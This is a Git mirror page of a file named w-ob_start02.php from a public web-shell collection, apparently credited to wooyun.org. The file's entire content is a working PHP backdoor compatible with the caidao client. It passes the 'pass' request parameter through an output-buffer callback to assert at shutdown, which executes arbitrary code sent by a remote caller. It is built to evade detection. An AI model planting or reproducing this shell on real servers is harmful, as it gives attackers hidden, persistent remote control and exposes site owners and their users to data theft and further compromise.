1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 04:41:28 +00:00
Files
webshell/caidao-shell/w-ob_start02.php
tennc 0d5688e8eb add w-ob_start02.php
author : isno
from : wooyun.org

success running PHP5.3.3 >=
2015-10-29 20:30:34 +08:00

6 lines
123 B
PHP

<?php
ob_start(function ($c,$d){register_shutdown_function('assert',$c);});
echo $_REQUEST['pass'];
ob_end_flush();
?>